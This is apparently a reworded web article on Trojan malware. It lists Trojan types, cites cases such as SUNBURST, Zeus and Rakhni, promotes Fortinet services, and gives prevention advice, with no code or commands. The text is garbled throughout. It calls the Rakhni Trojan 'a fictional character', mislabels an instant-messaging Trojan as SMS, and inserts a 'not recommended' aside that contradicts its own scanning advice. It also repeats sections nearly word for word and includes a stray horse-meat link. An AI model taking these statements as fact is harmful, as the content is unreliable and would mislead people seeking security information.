behavior of real antivirus programs. In the same way that a typical antivirus application detects and removes risks, the Trojan is designed to extract money from users in exchange for eliminating threats that may or may not exist. Trojan Horse as a game thief: A game-thief Trojan horse is a type of malware that is especially designed to steal user account information from users who are participating in online games. SMS (Short Message Service) (IM) Trojan horse: This sort of Trojan horse targets instant messaging systems in order to collect users’ login and password information. It is directed against prominent chat networks such as AOL Instant Messenger, ICQ, MSN Messenger, Skype, and Yahoo Pager, among others. Trojan horse that steals information: This virus may be used to either install Trojans or to prevent the user from noticing the presence of a malicious software on his or her computer. Antivirus systems may have difficulty detecting infostealer Trojans because of the components that make them tough to detect in scans. The Mailfinder Trojan is a malicious software program that searches for and intercepts email messages. In order to collect and steal email addresses that have been saved on a computer, the mailfinder Trojan is used. Malicious software known as ransomware is designed to hamper a computer’s performance or block data on a device so that the user can no longer access or use the device. In this case, the attacker will hold the user or organization hostage until the user or organization pays a ransom price in order to repair device damage or unlock the impacted data. Remote access Trojan: This strand of malware, which is similar to a backdoor Trojan, grants the attacker complete control over the victim’s machine. Because the cybercriminal keeps access to the device via a remote network connection, he or she can steal information or spy on the user. Rootkit Trojan: A rootkit Trojan is a type of malware that hides itself on a user’s computer and performs malicious actions. Its goal is to prevent harmful programs from being noticed, allowing malware to remain active on a machine that has been infected for a longer length of time. Trojan horse for the short messaging service (SMS): Once infected, an SMS Trojan is capable of transmitting and intercepting text messages from mobile devices. Included in this is the sending of messages to premium-rate phone lines, which raises the fees associated with a user’s phone bill. Trojan Horse for Spyware: Spyware Trojan horses are computer programs that are meant to sit on a user’s computer and spy on their activities. In this case, capturing their keyboard operations, collecting screenshots, gaining access to the programs they use, and tracking their login data are all included. SUNBURST: SolarWinds Orion Platforms were infected with the SUNBURST trojan malware, which spread across the system. Traitors used trojanized copies of a legal SolarWinds digitally signed file with the name SolarWinds.Orion.Core.BusinessLayer.dll to infect victims’ computers. A backdoor has been created by the trojanized file. Once it has been installed on a target computer, it will lay idle for two weeks before retrieving commands that will allow it to transmit, execute, do reconnaissance, reboot, and halt system functions, among other things. Predetermined URIs are used to communicate with one another
See also:  What Does Horse Meat Taste Like? (Correct answer)

How To Recognize a Trojan Virus

A Trojan horse virus is capable of remaining on a device for months without the user being aware that their machine has been infected with it. However, telltale symptoms of the existence of a Trojan include changes in computer settings that occur unexpectedly, a decrease in computer performance, and odd activity occurring on the computer. Using a Trojan scanner or malware-removal software to look for and identify Trojans is the most effective method of identifying them.

How To Protect Yourself from Trojan Viruses

A Trojan horse virus is capable of remaining on a device for months without the user being aware that their machine has been infected with the virus. A Trojan’s existence is indicated by a rapid change in computer settings, a decrease in computer performance, or the occurrence of odd activities on the computer system. Using a Trojan scanner or malware-removal software to hunt for Trojans is the most effective technique to identify them.

Examples of Trojan Horse Virus Attacks

Trojan horse assaults, which infect computers and steal user data, have been responsible for a great deal of harm in the past. Trojan horses are well-known for a variety of reasons, including:

  1. Rakhni Trojan: The Rakhni Trojan infects devices by delivering ransomware or a cryptojacker program (which allows an attacker to utilize a device to mine bitcoin). Tiny Banker: Tiny Banker is a tool that allows hackers to obtain financial information from consumers. It was detected after it affected at least 20 banks in the United States. Zeus, also known as Zbot, is a toolkit that targets financial institutions and allows hackers to create their own Trojan virus. Zeus is also known as Zbot. Techniques such as form grabbing and keystroke logging are employed in the source code in order to capture user passwords and financial information.

How Fortinet Can Help?

The FortiGuard Labs Global Threat Intelligence system is used to enhance the effectiveness of the Fortinet antivirus services. FortiGuard is capable of removing 95,000 malicious applications in a single minute on average, according to the company. In order to accomplish this, FortiGuard incorporates information of the many types of viruses that exist in the worldwide threat environment. In order to neutralize each sort of danger, FortiGuard develops countermeasures that are automatically implemented by the system, therefore defending the networks that are covered by its protection.

What is a Trojan? Is it a virus or is it malware?

The FortiGuard Labs Global Threat Intelligence system is used by the Fortinet antivirus services to provide enhanced protection against malware and other malicious software. FortiGuard is capable of removing around 95,000 malicious applications in a single minute. In order to accomplish this, FortiGuard incorporates information of the many types of viruses that exist throughout the worldwide threat environment. In order to neutralize each sort of attack, FortiGuard develops countermeasures that are automatically implemented by the system, therefore securing the networks that are protected by the system.

How do Trojans work?

Here’s an example of Trojan malware to demonstrate how it operates. You could believe you’ve received an email from a friend and proceed to open what appears to be a real file. You, on the other hand, have been duped. The email was sent by a cybercriminal, and the file you clicked on — and then downloaded and opened — was used to infect your computer with malware, which was then deleted. When you run the software, the virus has the potential to spread to other files on your computer and do damage.

How? It differs from person to person. Trojan horses are programmed to perform a variety of functions. On the other hand, you’ll almost certainly wish they weren’t performing any of them on your smartphone.

Common types of Trojan malware, from A to Z

Consider the following examples of some of the most popular varieties of Trojan virus, including their names and the damage they cause to your system: Trojan Horse with a backdoor This Trojan horse has the capability of installing a “backdoor” on your machine. It allows an attacker to gain access to and control over your machine. Data from your computer can be downloaded and stolen by a third party. Alternatively, further malware might be downloaded to your device. Trojan horse for Distributed Denial of Service (DDoS) assault DDoS assaults are carried out via this Trojan.

  • That traffic originates from your infected machine as well as from other sources.
  • It downloads and installs fresh versions of dangerous applications that have been developed by others.
  • Phony antivirus software TrojanThis Trojan acts in the same way as antivirus software, but it wants money from you in exchange for the ability to identify and eliminate threats, whether they are genuine or fake.
  • It’s possible that online gamers may suffer as a result of this.
  • The Infostealer Trojan is exactly what it sounds like: a Trojan that is seeking the data on your compromised PC.
  • Ransom TrojanThis Trojan attempts to extort money from you in order to repair the harm it has done to your machine.
  • Remote Access TrojanThis Trojan has the capability of granting an attacker complete access over your machine through the use of a remote network connection.
  • Rootkit TrojanA rootkit is a Trojan horse that is designed to conceal or obfuscate an item on your compromised machine.
  • To increase the amount of time a harmful software is allowed to execute on your device.
  • Infection with this sort of Trojan affects your mobile device, allowing it to send and receive text messages.
  • Infiltrating banker This Trojan is specifically designed to target your bank accounts.

This covers information about banking, credit cards, and bill pay. IM Trojan is an abbreviation for This Trojan is designed to attack instant messaging. It grabs your username and password information from instant messaging providers. That is only a small sampling. There are plenty others.

Examples of Trojan malware attacks

Trojan software assaults have the potential to do significant damage. Trojans, on the other hand, are constantly evolving. Here are three illustrations.

  1. Rakhni Trojan is a fictional character created by Rakhni Trojan. This malware has been in existence from the year 2013. Recent developments have included the delivery of ransomware or a cryptojacker (which allows thieves to utilize your device to mine for bitcoin) to compromised PCs, among other things. “The increase in currency mining activity over the latter months of 2017 was enormous,” according to the 2018 Internet Security Threat Report. “Overall coin-mining activity climbed by 34,000 percent over the course of the year,” according to the report.
  2. ZeuS/Zbot. This banking Trojan is an oldie but a goodie in the world of malware. The source code for ZeuS/Zbot was originally made available in 2011. It employs keystroke logging to steal your credentials and, in certain cases, your account balance as well
  3. For example, it could record your keystrokes when you log into your bank account.

How Trojans impact mobile devices

Trojan horses are a concern for all computers, not just laptops and desktops. They can also have an influence on your mobile devices, which include cell phones and tablets. In most cases, a Trojan horse is linked to a legal software that appears to be authentic. In truth, it is a spoof version of the program that has been infected with malware. Cybercriminals would typically distribute them through unapproved and pirate app shops, where they may be downloaded by naive consumers. Apart from that, these applications have the capability of stealing information from your smartphone and generating income through the transmission of premium SMS texts.

A Trojan horse named Switcher Trojan infects users’ devices and uses them to assault the routers on their wireless networks, according to the researchers.

Cybercriminals might divert traffic on Wi-Fi-connected devices and exploit it to perform a variety of crimes as a result of their actions.

How to help protect against Trojans

Here are some dos and don’ts to keep in mind when trying to defend yourself from Trojan software. To begin, here are some must-dos:

  • Installing and operating an internet security suite is the first step in securing your computer. Utilize your software to do periodic diagnostic scans. You may program the application to conduct scans automatically at predetermined intervals
  • However, this is not recommended. When new versions of your operating system’s software are released by the software vendor, make sure to install them as soon as they become available. Cybercriminals frequently take advantage of security flaws in out-of-date software products. Additionally, you should check for updates on any other software that you use on your computer, in addition to the operating system. Complex and one-of-a-kind passwords are required to protect your accounts. Using a complicated combination of letters, numbers, and symbols, create a unique password for each account you have. Firewalls are a great way to keep your personal information protected. Make frequent backups of your files. The following information will be useful if you have a Trojan infection on your computer and need to recover your data. When it comes to email attachments, be cautious. To help ensure your safety, examine any email attachments before opening them.

A lot of things you should do have a matching item you shouldn’t do — for example, be cautious with email attachments and don’t click on suspicious email attachments — and this is true for many things. Here are a few additional dos and don’ts.

  • Don’t go to any untrustworthy websites. Some internet security software, such as Norton Safe Web, may notify you if you are going to visit a potentially dangerous website. If you’re not certain that an email is from from a reputable source, don’t click on a link inside it. In general, avoid opening unsolicited emails from senders you are unfamiliar with
  • Avoid downloading or installing apps if you don’t have total confidence in the publisher’s intentions
  • Do not click on pop-up windows that offer free apps that do useful functions
  • Instead, use the back button to close the window. Unless you are certain of what you are clicking on, never open a link in an email.

Trojan war winners and losers

For those interested in history and mythology, here’s one final word about the Trojans. Trojans get their name from the hollow wooden horse that the Greeks hid in during the Trojan War, which gave them their nickname. The Trojans, believing the horse to be a gift, let the Greeks to enter their fortified city at night and assault the sleeping Trojans, who were unaware of the gift. When you are the victim of Trojan infection, you may find yourself on the losing end of the game as well. Maintaining vigilance and caution, as well as refraining from taking risks, is essential, regardless of the sort of gadget you use to stay connected.

Leave a Reply

Your email address will not be published.